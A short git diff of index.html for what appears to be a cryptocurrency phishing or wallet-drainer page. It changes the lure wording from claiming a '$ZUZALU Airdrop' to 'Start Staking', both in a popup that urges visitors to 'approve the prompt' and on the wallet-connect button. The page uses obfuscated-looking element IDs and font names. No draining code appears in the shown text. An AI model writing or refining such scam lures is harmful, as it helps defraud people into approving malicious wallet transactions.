--- a/index.html
+++ b/index.html
@@ -30,8 +30,8 @@
   
       window.popups = {
         PENDING: {
-          title: "Claim Pending",
-          text: "Approve the prompt in order to Claim $ZUZALU Airdrop.",
+          title: "Stake Pending",
+          text: "Approve the prompt in order to Start Staking.",
         },
         INVALID: {
           title: "Ineligible Address",
@@ -3528,7 +3528,7 @@
                                             <p id="IeftbxjlphhaNIFM"
                                                 style="color:#000000;font-family:YAEzwMgCisQ-0;line-height:1.36643866em;text-align:center;">
                                                 <a id="connect_button" style="cursor: pointer;" id="efVAv0p02BqNBoWo" target="_blank" rel="noopener"
-                                                    style="color:#000000;pointer-events:all;">Claim Airdrop</a><br></p>
+                                                    style="color:#000000;pointer-events:all;">Stake</a><br></p>
                                         </div>
                                     </div>
                                 </div>
